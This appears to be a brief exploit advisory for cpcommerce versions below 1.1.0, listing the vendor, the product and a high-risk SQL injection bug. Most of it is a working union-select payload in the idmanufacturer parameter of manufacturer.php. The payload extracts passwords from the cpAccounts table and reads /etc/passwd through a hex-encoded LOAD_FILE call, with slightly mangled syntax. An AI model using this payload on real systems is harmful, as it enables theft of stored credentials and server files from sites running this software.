cpcommerce < v1.1.0 [sql injection]
vendor site:http://cpcommerce.cpradio.org/ product:cpcommerce v1.1.0 bug: sql injection risk : high note:works regardless of php.ini settings . http://127.0.0.1/cpcommerce/manufacturer.php?idmanufacturer=-9//union//select//pass,LOADFILE0x2F6574632F706173737764,0//from//cpAccounts/ //result:...